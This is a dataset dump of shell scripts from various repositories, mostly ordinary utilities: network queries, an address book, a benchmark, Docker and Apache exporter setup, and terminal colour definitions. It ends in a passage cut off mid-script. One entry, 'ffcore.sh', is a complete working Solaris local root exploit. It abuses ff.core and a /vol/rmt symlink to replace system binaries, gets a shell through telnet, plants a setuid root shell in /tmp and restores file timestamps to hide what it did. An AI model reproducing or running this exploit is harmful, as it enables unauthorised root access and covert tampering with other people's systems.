blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
a495574454c2212b571ddf392e6d99b1764056ae
|
Shell
|
insofter/icd
|
/scripts/icd-current
|
UTF-8
| 2,078
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/sh
case "$1" in
eth)
case "$2" in
ip)
ifconfig eth0 | sed -n 's/^[^i]*inet addr:\([0-9.][0-9.]*\).*$/\1/p'
;;
mask)
ifconfig eth0 | sed -n 's/^[^M]*Mask:\([0-9.][0-9.]*\).*$/\1/p'
;;
gate)
route | sed -n 's/^default[[:space:]]*\([0-9.][0-9.]*\).*$/\1/p' | head -1
;;
dns1)
cat /etc/resolv.conf | awk '/nameserver/ {print $2}' | sed -n 1p
;;
dns2)
cat /etc/resolv.conf | awk '/nameserver/ {print $2}' | sed -n 2p
;;
mac)
ifconfig eth0 | sed -n 's/^[^H]*HWaddr[[:space:]]*\([[:xdigit:]:][[:xdigit:]:]*\).*$/\1/p'
;;
esac
;;
wifi)
case "$2" in
ip)
wpa_cli -i wlan0 status 2>/dev/null | awk -F '=' ''/'ip_address'/' {print $2}'
;;
ssid)
wpa_cli -i wlan0 status 2>/dev/null | grep -v bssid | awk -F '=' ''/'ssid'/' {print $2}'
;;
ip-ssid)
echo -n `wpa_cli -i wlan0 status 2>/dev/null | awk -F '=' ''/'ip_address'/' {print $2}'`
echo -n " -- "
echo `wpa_cli -i wlan0 status 2>/dev/null | grep -v bssid | awk -F '=' ''/'ssid'/' {print $2}'`
;;
esac
;;
gsm)
case "$2" in
pin_enabled)
out=`wvdial $2 -C $ICD_SHARE_DIR/common_wvdial.conf 2>&1`
if [ "`echo "$out" | grep '^+CLCK:' | awk '{print $2}'`" = "1" ]; then
echo "yes"
else
if echo "$out" | grep -q '+CME ERROR: SIM PIN required'; then
echo "yes"
else
echo "no"
fi
fi
;;
pin_status)
wvdial $2 -C $ICD_SHARE_DIR/common_wvdial.conf 2>&1 | grep "^+CPIN:" | awk '{print $2 $3}'
;;
logged)
if [ "`wvdial $2 -C $ICD_SHARE_DIR/common_wvdial.conf 2>&1 | grep '^+CREG:' | awk '{print $2}'`" = "0,1" ]; then
echo "yes"
else
echo "no"
fi
esac
;;
*)
echo Usage: $0 section param
cat `readlink -f $0` | grep ')$' | grep -v '*)' | sed 's/)//g; s/^ / * /g; s/ / /g'
;;
esac
| true
|
cc935ae033e652af349962e10c9bc42c603a5309
|
Shell
|
m-luck/c_utility_benchmarker
|
/runscript.sh
|
UTF-8
| 388
| 3.109375
| 3
|
[] |
no_license
|
#!/bin/bash
# simple script to build and run the c program
BLOCK_SIZE=$1
# create a file of BLOCK_SIZE bytes
dd if=/dev/zero of=./output.dat bs=$BLOCK_SIZE count=1;
# compile the c script
gcc testscript.c -o testfile
# run the script
./testfile $BLOCK_SIZE
# remove the script after running
rm testfile
# remove the data block file
rm output.dat
# remove the output files
rm temp*.dat
| true
|
d95ce2436a2777e674be14a0d3c7f73809481612
|
Shell
|
northfun/SelfUseTrackNum
|
/fftranslateCmd.sh
|
UTF-8
| 1,312
| 3.5625
| 4
|
[] |
no_license
|
#! /bin/sh
checkInt1(){
tmp=`echo $1 |sed 's/[0-9]//g'`
# [ -n "${tmp}" ] && { echo $1"Args must be integer!";echo 1; }
[ -n "${tmp}" ] && echo 1
}
#getparams(){
# echo $1
# list=`$1`
# for var in $list ; do
# res=`checkInt1 $var`
# if [ "$res" == "1" ];then
# continue
# fi
# if [ "$params" == "" ]; then
# params=$var
# else
# params=$params","$var
# fi
# done
# echo $params
#}
diffcmd(){
params=""
list=`git diff | grep USER.*$1.*PARAM.*= | cut -d'=' -f 2 `
for var in ${list} ; do
res=`checkInt1 $var`
if [ "$res" == "1" ];then
continue
fi
if [ "$params" == "" ]; then
params=$var
else
params=$params","$var
fi
done
echo $params
}
allcmd(){
params=""
list=` grep USER.*$1.*PARAM.*= $2 | cut -d'=' -f 2 `
for var in ${list} ; do
res=`checkInt1 $var`
if [ "$res" == "1" ];then
continue
fi
if [ "$params" == "" ]; then
params=$var
else
params=$params","$var
fi
done
echo $params
}
case $1 in
allcmd)
allcmd $2 $3
;;
diffcmd)
diffcmd $2
;;
*)
echo default
;;
esac
| true
|
accd17a09836702aa48592085ae38dcc43152add
|
Shell
|
antx42/basescript
|
/check/check-base-env-file.sh
|
UTF-8
| 1,343
| 3.65625
| 4
|
[] |
no_license
|
#-----------------------------------------------------------------------
#
# Basescript function
#
# The basescript functions were designed to work as abstract function,
# so it could be used in many different contexts executing specific job
# always remembering Unix concept DOTADIW - "Do One Thing And Do It Well"
#
# Developed by
# Evert Ramos <evert.ramos@gmail.com>
#
# Copyright Evert Ramos
#
#-----------------------------------------------------------------------
#
# Be careful when editing this file, it is part of a bigger script!
#
# Basescript - https://github.com/evertramos/basescript
#
#-----------------------------------------------------------------------
#-----------------------------------------------------------------------
# This function has one main objective:
# 1. Check if the .env file exists in the base folder
#
# You must/might inform the parameters below:
# 1. n/a
# 2. [optional] (default: ) n/a
#
#-----------------------------------------------------------------------
check_base_env_file()
{
if [[ "$DEBUG" == true ]]; then
echo "Check if base folder '.env' file is set."
fi
cd $SCRIPT_PATH"/../"
if [[ -e .env ]]; then
source .env
cd - > /dev/null 2>&1
else
MESSAGE="'.env' file not found at the base folder. Please check! \n\n path: $(pwd)"
return 1
fi
}
| true
|
4ebe7d07c607dcfa8b9d2b6f9c0e78ee6ce0f157
|
Shell
|
n18006/unix1
|
/0613/061301.sh
|
UTF-8
| 146
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
today=$(date '+%s')
summer_vacation=$(date -d '20180910' '+%s')
ret=$(($summer_vacation - $today))
ret=$((ret/87400+1))
echo $ret日
| true
|
761041be56b3f983341ec2876f425341581dd5e6
|
Shell
|
SAKSHIPATEL/AddressBook
|
/address.sh
|
UTF-8
| 2,513
| 3.625
| 4
|
[] |
no_license
|
#!/bin/bash -x
echo "welcome to adress book"
declare -A address
echo "maximum slots is 10"
for ((i=0;i<10;i++))
do
address[$i,0]=" "
done
function Address(){
read -p "Enter First name:" Firstname
address[$1,0]=$Firstname
read -p "Enter Last name:" Lastname
address[$1,1]=$Lastname
read -p "Enter mob number:" Mobnum
address[$1,2]=$Mobnum
read -p "Enter City:" city
address[$1,3]=$city
read -p "Enter State:" state
address[$1,4]=$state
read -p "Enter pin:" pin
address[$1,5]=$pin
}
function display()
{
count=1
for ((i=0;i<=5;i++))
do
echo "Slot:$count"
((count++))
for ((j=0;j<=6;j++)) do
echo ${address[$i,$j]}
done
done
}
function insert()
{
count=0
stop=$1
empty=" "
for ((i=0;i<=10;i++))
do
if [[ " ${address[$i,0]} " =~ " $empty " ]]
then
Address $i
((count++))
echo "next"
else
continue
fi
if [ $count -eq $stop ]
then
break
fi
done
}
#existing Address
address[0,0]=Sakshi
address[0,1]=Patel
address[0,2]=1234567894
address[0,3]=chandrapur
address[0,4]=maharashtra
address[0,5]=442908
address[1,0]=Shradha
address[1,1]=Patel
address[1,2]=9788005211
address[1,3]=rajura
address[1,4]=maharashtra
address[1,5]=442908
function edit()
{
position=$(($1-1))
echo "1.First name 2.last name 3.mobile number 4.city 5.state 6.pin"
read -p "select number from the above fields to edit" field
case $field in
1)read -p "ReEnter Firstname:" edit
address[$position,0]=$edit;;
2)read -p "ReEnter Lastname:" edit
address[$position,1]=$edit;;
3)read -p "ReEnter Mobile number:" edit
address[$pos,2]=$edit;;
4)read -p "ReEnter city:" edit
address[$position,3]=$edit;;
5)read -p "ReEnter state:" edit
address[$position,4]=$edit;;
6)read -p "ReEnter pin:" edit
address[$position,5]=$edit;;
*);;
esac
}
function delete()
{
read -p "enter slot number to delete" pos
pos=$(($pos-1))
echo "deleted Adress"
for((i=0;i<6;i++))
do
echo {$address[$pos,$i]}
done
for ((i=0;i<6;i++));do
address[$pos,$i]=' ';done
}
while [ true ]
do
echo "1.display the address 2.insert 3.edit 4.delete 5.exit"
read -p "enter your choices" choice
case $choice in
1)display;;
2)read -p "how many adress will u add:" num
insert $num;;
3)read -p "enter the adreess slot number to edit :" e
edit $e;;
4)delete;;
5)exit;;
*)echo "enter your correct choice";;
esac
done
| true
|
8509aceff324c89dde75d47e253326b4f16e47fe
|
Shell
|
seantrane/dotfiles
|
/shell/response.sh
|
UTF-8
| 3,784
| 2.84375
| 3
|
[
"ISC"
] |
permissive
|
#!/usr/bin/env bash
#
# Shell Response Text/Colors/Helpers
#
# This file contains text/color effects and
# text-response helper functions for Shell scripts.
#
# shellcheck disable=SC1090,SC1091
# Color Switch
export SWITCH='\033['
# Clear whole line and hard-line-return
export ClearLine="${SWITCH}2K"
export ClearLineReturn="${ClearLine}\r"
export ClearNewLine="${ClearLineReturn}\n"
# Text Attributes
export Reset="${SWITCH}0m"
export Bold="${SWITCH}1m"
export Dim="${SWITCH}2m"
export Underline="${SWITCH}4m"
export Blink="${SWITCH}5m"
export Reverse="${SWITCH}7m"
export Hidden="${SWITCH}8m"
# Regular Colors
export Black="${SWITCH}0;30m"
export Red="${SWITCH}0;31m"
export Green="${SWITCH}0;32m"
export Yellow="${SWITCH}0;33m"
export Blue="${SWITCH}0;34m"
export Magenta="${SWITCH}0;35m"
export Cyan="${SWITCH}0;36m"
export White="${SWITCH}0;37m"
export Default="${SWITCH}0;39m"
# Bold
export BBlack="${SWITCH}1;30m"
export BRed="${SWITCH}1;31m"
export BGreen="${SWITCH}1;32m"
export BYellow="${SWITCH}1;33m"
export BBlue="${SWITCH}1;34m"
export BMagenta="${SWITCH}1;35m"
export BCyan="${SWITCH}1;36m"
export BWhite="${SWITCH}1;37m"
export BDefault="${SWITCH}1;39m"
# Underline
export UBlack="${SWITCH}4;30m"
export URed="${SWITCH}4;31m"
export UGreen="${SWITCH}4;32m"
export UYellow="${SWITCH}4;33m"
export UBlue="${SWITCH}4;34m"
export UMagenta="${SWITCH}4;35m"
export UCyan="${SWITCH}4;36m"
export UWhite="${SWITCH}4;37m"
export UDefault="${SWITCH}4;39m"
# Background
export BGBlack="${SWITCH}40m"
export BGRed="${SWITCH}41m"
export BGGreen="${SWITCH}42m"
export BGYellow="${SWITCH}43m"
export BGBlue="${SWITCH}44m"
export BGMagenta="${SWITCH}45m"
export BGCyan="${SWITCH}46m"
export BGWhite="${SWITCH}47m"
export BGDefault="${SWITCH}49m"
# High Intensity
export IBlack="${SWITCH}0;90m"
export IRed="${SWITCH}0;91m"
export IGreen="${SWITCH}0;92m"
export IYellow="${SWITCH}0;93m"
export IBlue="${SWITCH}0;94m"
export IMagenta="${SWITCH}0;95m"
export ICyan="${SWITCH}0;96m"
export IWhite="${SWITCH}0;97m"
export IDefault="${SWITCH}0;99m"
# Bold High Intensity
export BIBlack="${SWITCH}1;90m"
export BIRed="${SWITCH}1;91m"
export BIGreen="${SWITCH}1;92m"
export BIYellow="${SWITCH}1;93m"
export BIBlue="${SWITCH}1;94m"
export BIMagenta="${SWITCH}1;95m"
export BICyan="${SWITCH}1;96m"
export BIWhite="${SWITCH}1;97m"
export BIDefault="${SWITCH}1;99m"
# High Intensity backgrounds
export BGIBlack="${SWITCH}0;100m"
export BGIRed="${SWITCH}0;101m"
export BGIGreen="${SWITCH}0;102m"
export BGIYellow="${SWITCH}0;103m"
export BGIBlue="${SWITCH}0;104m"
export BGIMagenta="${SWITCH}0;105m"
export BGICyan="${SWITCH}0;106m"
export BGIWhite="${SWITCH}0;107m"
export BGIDefault="${SWITCH}0;109m"
#-----------------------------------------------------------------------
# Shell Response Helpers
#-----------------------------------------------------------------------
# ! type "sh_text" &> /dev/null && . "$DOTFILES/functions/sh_text"
# ! type "sh_user" &> /dev/null && . "$DOTFILES/functions/sh_user"
# ! type "sh_yesno" &> /dev/null && . "$DOTFILES/functions/sh_yesno"
# ! type "sh_alert" &> /dev/null && . "$DOTFILES/functions/sh_alert"
# ! type "sh_info" &> /dev/null && . "$DOTFILES/functions/sh_info"
# ! type "sh_note" &> /dev/null && . "$DOTFILES/functions/sh_note"
# ! type "sh_error" &> /dev/null && . "$DOTFILES/functions/sh_error"
# ! type "sh_success" &> /dev/null && . "$DOTFILES/functions/sh_success"
# ! type "sh_fail" &> /dev/null && . "$DOTFILES/functions/sh_fail"
. "$DOTFILES/functions/sh_text"
. "$DOTFILES/functions/sh_user"
. "$DOTFILES/functions/sh_yesno"
. "$DOTFILES/functions/sh_alert"
. "$DOTFILES/functions/sh_info"
. "$DOTFILES/functions/sh_note"
. "$DOTFILES/functions/sh_error"
. "$DOTFILES/functions/sh_success"
. "$DOTFILES/functions/sh_fail"
| true
|
9567205e1e7140c10d61ece34f6bb4f2e9b65616
|
Shell
|
emre-basala/heroku-inkscape-buildpack
|
/bin/compile
|
UTF-8
| 914
| 3.09375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
BUILD_DIR=${1:-}
CACHE_DIR=${2:-}
mkdir -p "$BUILD_DIR/.intltool"
cd "$BUILD_DIR/.intltool"
# wget https://launchpad.net/intltool/trunk/0.51.0/+download/intltool-0.51.0.tar.gz
# tar -xf intltool-0.51.0.tar.gz
# cd intltool-0.51.0
# ./configure
# make
curl http://ftp.gnome.org/pub/GNOME/sources/intltool/0.40/intltool-0.40.6.tar.gz -o intltool.tar.gz
# Unzip
tar -xvf intltool.tar.gz
# Get into intltool folder
cd intltool-0.40.6
# Configure build
./configure
# Make intltool
make
# Install intltool
make install
# inkscape
mkdir -p "$BUILD_DIR/.inkscape/"
cd "$BUILD_DIR/.inkscape/"
# wget https://inkscape.org/en/gallery/item/3854/inkscape-0.91.tar.gz
wget https://inkscape.org/en/gallery/item/11254/inkscape-0.92.2.tar.bz2
tar -xvjf inkscape-0.92.2.tar.bz2
cd inkscape-0.92.2
mkdir build
cd build
cmake ..
make
make install
# export PATH="$BUILD_DIR/.inkscape/inkscape-0.91/bin":$PATH
| true
|
b6f703b614008d667b82179f8919ac3ef791a033
|
Shell
|
TobyHFerguson/OpenX_GCP_PoC
|
/bin/make-ssh-config.sh
|
UTF-8
| 1,747
| 3.75
| 4
|
[] |
no_license
|
. $(dirname $0)/../cluster.properties
# Use jq to number the different roles
#PREFIX=${1:?"No name prefix supplied"}
# Hosts by role is an array with the 0,2,4 etc. being keys, and the 1,3,5 etc being values
# The keys are in the set {cm,gateway,master,worker} and are sorted
hosts_by_role=($(gcloud compute instances list --filter="name~^${PREFIX}-.*" --format="[csv,no-heading](metadata.items[2].value:sort=1,networkInterfaces[0].accessConfigs[0].natIP)"))
# These arrays are the 'role' arrays - the contents of each array are the ip addresses for each role
declare -a cm
declare -a gateway
declare -a master
declare -a worker
# parse the hosts by role array to create the role arrays
function parse_hosts(){
while [ $# -ne 0 ]
do
case $1 in
cm) cm+=($2);;
gateway) gateway+=($2);;
master) master+=($2);;
worker) worker+=($2);;
*) Unknown key: $1 1>&2;;
esac
shift; shift
done
}
# Make an entry for ssh_config given a hostname and an ip address
function make_entry() {
cat <<EOF
Host $1
Hostname $2
EOF
}
# make_entries name addresses
# For each address create an ssh config entry, suffixing the name with the address index to disambiguate
function make_entries() {
name=${PREFIX:?}-${1:?"No name given"}
shift
if [ $# -eq 1 ]
then
make_entry $name $1
else
i=0
while [ $# -ne 0 ]
do
make_entry ${name}${i} $1
shift
i=$((i + 1))
done
fi
}
parse_hosts ${hosts_by_role[*]}
make_entries cm ${cm[*]}
make_entries gateway ${gateway[*]}
make_entries master ${master[*]}
make_entries worker ${worker[*]}
cat <<EOF
Match originalhost=${PREFIX:?}-*
StrictHostKeyChecking no
CheckHostIP no
User toby
IdentityFile ${SSH_KEY_PATH:?}
EOF
| true
|
1877af0f2ae2ab1934b6611f889a0a4fa7c09081
|
Shell
|
3453-315h/mirror-hack.co.za
|
/hack.co.za/exploits/os/solaris/sparc/2.5.1/ffcore.sh
|
UTF-8
| 3,650
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/sh
# /usr/openwin/bin/ff.core exploit - horizon
# tested on 2.5.1, and 2.6
# thanks to joej, adm, and joej :>
# you can use ff.core to do a rename() as root
# files must be on same filesystem and the destination must be in a
# directory that is a subset of the source directory
# this exploit can be pretty messy. what it does is move /usr/bin/sh
# over /usr/bin/admintool. then it moves /usr/sbin/swmtool (which is a symlink
# to /usr/bin/admintool) on top of /usr/sbin/in.rlogind. It's attempts to
# clean up best it can. This has the potential of messing lots of stuff up, and
# tripwire is not going to be particularly happy.
# if you want to exploit 2.5, you can just make this move /etc/group over
# /etc/shadow. you will probably want to move /etc/shadow to /etc/s.bak
# first test if we can pull this off
echo "Testing if exploit is possible..."
if [ -x /usr/openwin/bin/ff.core ]
then
:
else
echo "ff.core isn't there or executable. :/"
exit 1
fi
if [ -w /vol/rmt ]
then
:
else
echo "We can't do the symlink. :<"
exit 1
fi
mkdir /tmp/.test42
touch /tmp/.test42/bob
rm -f /vol/rmt/diskette0
ln -fs /tmp/.test42 /vol/rmt/diskette0
/usr/openwin/bin/ff.core -r /vol/rmt/diskette0/bob jim /floppy/ 2>/dev/null
if [ -f /tmp/.test42/jim ]
then
echo "Test successful. Proceeding..."
else
echo "Hmmm.. doesn't look like this is going to work :/"
exit 1
fi
rm -rf /tmp/.test42
# lets make some backups
echo "Backing up clobbered files to /tmp/.bk"
mkdir /tmp/.bk
#save admintools times
touch /tmp/.bk/admintool
touch -r /usr/bin/admintool /tmp/.bk/admintool
#save rloginds times
touch /tmp/.bk/in.rlogind
touch -r /usr/sbin/in.rlogind /tmp/.bk/in.rlogind
#save a copy of /usr/bin/sh
cp /usr/bin/sh /tmp/.bk
touch -r /usr/bin/sh /tmp/.bk/sh
echo "Doing sploit..."
rm -f /vol/rmt/diskette0
ln -fs /usr/bin /vol/rmt/diskette0
/usr/openwin/bin/ff.core -r /vol/rmt/diskette0/admintool admintool.bak /floppy/ 2>/dev/null
rm -f /vol/rmt/diskette0
ln -fs /usr/bin /vol/rmt/diskette0
/usr/openwin/bin/ff.core -r /vol/rmt/diskette0/sh admintool /floppy/ 2>/dev/null
rm -f /vol/rmt/diskette0
ln -fs /usr/sbin /vol/rmt/diskette0
/usr/openwin/bin/ff.core -r /vol/rmt/diskette0/in.rlogind in.rlogind.bak /floppy/ 2>/dev/null
rm -f /vol/rmt/diskette0
ln -fs /usr/sbin /vol/rmt/diskette0
/usr/openwin/bin/ff.core -r /vol/rmt/diskette0/swmtool in.rlogind /floppy/ 2>/dev/null
echo "Done with sploit. Testing and trying to clean up now..."
sleep 1
(sleep 2;echo "\
cp /bin/rksh /tmp/bob;\
chmod 4755 /tmp/bob;\
exit;\
") | telnet localhost login
sleep 1
if [ -f /tmp/bob ]
then
echo "w00p! Should have a suid root sh in /tmp/bob"
echo "btw, its rksh because solaris is silly"
echo "Let me try to clean up my mess..."
else
echo "hrmmph.. didnt work. hope shits not screwed up bad :/"
exit 1
fi
echo "
cp /tmp/.bk/sh /usr/bin/sh
chmod 555 /usr/bin/sh
chown bin /usr/bin/sh
chgrp root /usr/bin/sh
touch -r /tmp/.bk/sh /usr/bin/sh
mv /usr/bin/admintool.bak /usr/bin/admintool
touch -r /tmp/.bk/admintool /usr/bin/admintool
rm -f /usr/sbin/swmtool
ln -s /usr/bin/admintool /usr/sbin/swmtool
touch -r /usr/bin/admintool /usr/sbin/swmtool
rm -f /usr/sbin/in.rlogind
mv /usr/sbin/in.rlogind.bak /usr/sbin/in.rlogind
touch -r /tmp/.bk/in.rlogind /usr/sbin/in.rlogind
rm -rf /tmp/.bk
" | /tmp/bob
echo "everything should be cool.. i think :>"
/tmp/bob
# www.hack.co.za [2000]#
| true
|
240bab42787a3502df9238050a7cfc278eb70b97
|
Shell
|
hfiguiere/exifprobe
|
/makebyteorder.sh
|
UTF-8
| 558
| 3.359375
| 3
|
[
"BSD-2-Clause",
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
# @(#) $Id: makebyteorder.sh,v 1.1 2003/01/12 19:30:31 alex Exp $
if test -f /usr/include/machine/endian.h
then
byteorder=`grep BYTE_ /usr/include/machine/endian.h`
elif test -f /usr/include/bits/endian.h
then
byteorder=`grep BYTE_ /usr/include/bits/endian.h`
fi
case "${byteorder}" in
*BIG*) echo "#define NATIVE_BYTEORDER_BIGENDIAN" > byteorder.h ;;
*LITTLE*) echo "#define NATIVE_BYTEORDER_LITTLE_ENDIAN" > byteorder.h ;;
*) echo "#define NATIVE_BYTEORDER_UNKNOWN /* assume little-endian */" > byteorder.h ;;
esac
exit 0
| true
|
3fcb1c9aff8549d4ee4ab96ca982ad481cd6a232
|
Shell
|
sanjaymadane/qpk-studio
|
/shared/init/initcontainer.sh
|
UTF-8
| 1,707
| 3.671875
| 4
|
[] |
no_license
|
#!/bin/sh
CONF="/etc/config/qpkg.conf"
CONTAINER_STATION_NAME="container-station"
CONTAINER_STATION_PATH=$(/sbin/getcfg $CONTAINER_STATION_NAME Install_Path -f $CONF)
mountlocaltime=" -v /etc/localtime:/etc/localtime"
SYSTEM_MOUNT=" -v /etc/qbus:/etc/qbus -v $CONTAINER_STATION_PATH/usr/bin/.libs/qbus:/bin/qbus -v /var/run/qbus.sock:/var/run/qbus.sock "
QPKG_PATH=/mnt/ext/opt/qpk
info=$(cat < $QPKG_PATH/container_ver.conf)
NODE_NAME=$(echo $info | awk {'print $1'} | awk -F '=' {'print $2'})
NODE_VERSION=$(echo $info | awk {'print $2'} | awk -F '=' {'print $2'})
MONGO_CONTAINER=$(echo $info | awk {'print $3'} | awk -F '=' {'print $2'})
SERVER1_CONTAINER=$(echo $info | awk {'print $4'} | awk -F '=' {'print $2'})
create_container() {
name=$1
image=$2
ver=$3
mkdir -p .cache_qpk
docker ps -a | grep $name >/dev/null
RET=$?
if test "$RET" = "0"
then
CONTAINER_ID=$(docker ps -a | grep $name | awk '{print $1}')
echo "$name Container is stop and remove it. $CONTAINER_ID"
docker stop $CONTAINER_ID
docker rm $CONTAINER_ID
fi
if test "$name" = "$MONGO_CONTAINER"
then
docker run -d -e AUTH="no" $mountlocaltime -p 27025:27017 -v $QPKG_PATH/mongodata/:/data/db --name $MONGO_CONTAINER $image:$ver mongod
fi
if test "$name" = "$SERVER1_CONTAINER"
then
docker run -d $mountlocaltime -p 9010:9010 -v /share/Public/.cache_qpk:/server/public/nas_cache -v $QPKG_PATH/server/:/server $SYSTEM_MOUNT -v /etc/config/:/app_config --name $SERVER1_CONTAINER --entrypoint /bin/bash $image:$ver /server/start_server.sh
fi
}
create_container $MONGO_CONTAINER $NODE_NAME $NODE_VERSION
create_container $SERVER1_CONTAINER $NODE_NAME $NODE_VERSION
| true
|
701d0fcbccc88d05955b330d0d032ab60c0d213a
|
Shell
|
rkudache31/AWS_IAM_Script
|
/usermanagment.sh
|
UTF-8
| 1,598
| 3.421875
| 3
|
[] |
no_license
|
####################################################################
#Script Details:- This script for user managment activity #
#Auther:- Ravindra Kudache Date:- 21-08-20 #
####################################################################
echo "Please select one of the codition
press 1 usercreation
press 2 useraddtion in group
press 3 User assign polices
"
read input
#username=$1
#groupname=$2
#User addition function
useradd(){
echo "Enter username "
read username
if [ -z $username ]
then
echo "missing username"
else
aws iam create-user --user-name $username
if [ $? == 0 ]
then
echo "User $username is add"
fi
fi
}
#Group add function
UserAddGroup(){
echo "Enter username "
read username
echo "Enter group name"
read groupname
if [ -z $username ] | [ -z $groupname ]
then
echo "missing username or groupname please rerun script"
else
aws iam add-user-to-group --user-name $username --group-name $groupname
if [ $? == 0 ]
then
echo "User $username is added in $groupname"
fi
fi
}
UserAddRole(){
echo "Enter Policeis ARN"
read role
echo "Enter username"
read username
if [ -z $username ] | [ -z $role ]
then
echo "missing username or role please rerun script"
else
aws iam attach-user-policy --user-name $username --policy-arn $role
if [ $? == 0 ]
then
echo "User $username is added in $role polices "
fi
fi
}
#As per input run the script
case "$input" in
"1") useradd
;;
"2") UserAddGroup
;;
"3") UserAddRole
;;
*) echo "Sorry wrong input"
;;
esac
| true
|
711f82effae7a1e454087b16e5dfaa7a74991ae6
|
Shell
|
BullHacks3/DevSecops
|
/Bash_Script/Linux_Commands/test.sh
|
UTF-8
| 243
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash
function command_descriptor()
{
for i in `cat README1.md`;
do
help=$(man $i | grep -i -A1 NAME | head -2 | tail -1 | awk '{$1=$2="";print $0}')
printf "%-10s \t \t | %s \n" "$i" "$help" >> new.txt
done
}
command_descriptor
| true
|
84fc0fd0529d1d7acc4f99352fc458b8b5d59f68
|
Shell
|
yank07/WPM
|
/produccion/production_deploy.sh
|
UTF-8
| 933
| 3
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#restaurar la bd en una nueva
echo Poblando la base de datos... Si se le solicita la contraseña del usuario postgres, ingresela
su postgres -c "psql -q WPMDB_prod < wpmdb.sql"
#crear directorio para descargar del git
echo Descargando proyecto de github
mkdir source
cd source
git clone https://github.com/yank07/WPM.git
#copiar settings.py modificado con la bd produccion
cd ..
cp settings.py ./source/WPM/WPM
cp jquery-1.11.0.min.js .source/WPM/WPM/static/js
#copiar al root del apache
echo Copiando al root del apache...
cd source
sudo cp -R WPM /var/www/
cd /var/www
cd ./WPM/WPM/
sudo mkdir uploaded_files
cd uploaded_files
sudo mkdir tmp
cd /var/www
sudo chown -R www-data WPM
sudo chmod -R 777 WPM
sudo mkdir .matplotlib
sudo chmod -R 757 .matplotlib
#reiniciar el apache
echo Reiniciando el servidor apache...
sudo service apache2 restart
echo Listo! Abra el navegador e ingrese la direccion especificada
| true
|
ca89547c3dfd355e5010889618b37f556a1753d2
|
Shell
|
allardais/validwd
|
/tools/import_index.bash
|
UTF-8
| 743
| 3.3125
| 3
|
[] |
no_license
|
#!/bin/bash
source values.bash
echo -e "\n`date +%T` Выполняется импорт индекса json\n"
echo "drop table if exists jsonindex; \
create table jsonindex ( \
item char (20) primary key, \
pos bigint, \
len int); \
load data local infile '"$WORK_FILES_PATH"index.csv' \
into table jsonindex \
fields terminated by ';' \
enclosed by '' \
lines terminated by '\n' \
(item, pos, len);" | \
mysql --user=$USER --password=$PASS --local-infile=1 $DB
TIME=$SECONDS
let "SEC= TIME % 60"
let "MIN= (TIME / 60) % 60"
let "HOUR= TIME / 3600"
echo -e "\n`date +%T` Импорт индекса json выполнен за $HOUR ч. $MIN мин. $SEC сек.\n"
exit 0
| true
|
57e6908eb64db9b231a64400701b7d283fd28b40
|
Shell
|
elsom25/dotfiles
|
/script/clean
|
UTF-8
| 220
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
#
# install without user input
DOTFILES_ROOT="`pwd`"
source "${DOTFILES_ROOT}/script/base/common.sh"
source "${DOTFILES_ROOT}/script/base/uninstall.sh"
set -e
echo ''
delete_all
echo ''
echo ' Cleaned!'
| true
|
55a274442fa19ff0e2ac301cac56801f5b4a444e
|
Shell
|
andrew19932/monitoring
|
/apache-exp.sh
|
UTF-8
| 2,411
| 3.3125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
cd /home/andrew
curl -O https://dl.google.com/go/go1.11.linux-amd64.tar.gz
sudo tar -C /usr/local -xvzf go1.11.linux-amd64.tar.gz
echo "export GOPATH=$HOME/go" >> ~/.profile
echo "export PATH=$PATH:/usr/local/go/bin" >> ~/.profile
source ~/.profile
go get -v github.com/Lusitaniae/apache_exporter
sudo cp ~/go/bin/apache_exporter /usr/sbin/
touch /etc/systemd/system/apache_exporter.service
sudo cat << EOF > /etc/systemd/system/apache_exporter.service
[Unit]
Description=Apache Exporter
[Service]
User=ubuntu
EnvironmentFile=/etc/sysconfig/apache_exporter
ExecStart=/usr/sbin/apache_exporter $OPTIONS
[Install]
WantedBy=multi-user.target
EOF
sudo mkdir -p /etc/sysconfig
sudo touch /etc/sysconfig/apache_exporter
#sudo cat << EOF > /etc/sysconfig/apache_exporter
#OPTIONS="-scrape_uri='http://127.0.0.1/server-status/?auto'"
#EOF
sudo mv /etc/apache2/mods-enabled/status.conf /etc/apache2/mods-enabled/status.example
touch /etc/apache2/mods-enabled/status.conf
sudo cat << EOF > /etc/apache2/mods-enabled/status.conf
<IfModule mod_status.c>
# Allow server status reports generated by mod_status,
# with the URL of http://servername/server-status
# Uncomment and change the "192.0.2.0/24" to allow access from other hosts.
<Location /server-status>
SetHandler server-status
Require local
#Require ip 192.0.2.0/24
Require ip 127.0.0.1/32
</Location>
# Keep track of extended status information for each request
ExtendedStatus On
# Determine if mod_status displays the first 63 characters of a request or
# the last 63, assuming the request itself is greater than 63 chars.
# Default: Off
#SeeRequestTail On
<IfModule mod_proxy.c>
# Show Proxy LoadBalancer status in mod_status
ProxyStatus On
</IfModule>
</IfModule>
EOF
match='RewriteRule'
insert='RewriteCond %{REQUEST_URI} !^/server-status/?(.*)'
lms_file='/etc/apache2/sites-available/astria_lms.conf'
sed -i "s/$match/$match\n$insert/" $lms_file
#RewriteCond %{REQUEST_URI} !^/server-status/?(.*)
echo apache_exporter.service file is created
sudo systemctl daemon-reload
sudo systemctl enable apache_exporter.service
sudo systemctl start apache_exporter
echo Starting apache exporter...
sudo systemctl status apache_exporter
| true
|
f53ff9ed8d6aa96049ebd7ae763ac10dc2483bd4
|
Shell
|
remigermain/corewar
|
/script/vm_script_diff.sh
|
UTF-8
| 1,518
| 3.25
| 3
|
[] |
no_license
|
#!/bin/bash
WORSE="0"
BEST="16777216"
COUNTER=$1
SUM="0"
ERROR="0"
if [[ $# -ne 3 ]]
then
echo -e "You need 3 params\nscript [cycle start] [cycle_end] <champion.cor>"
exit;
fi
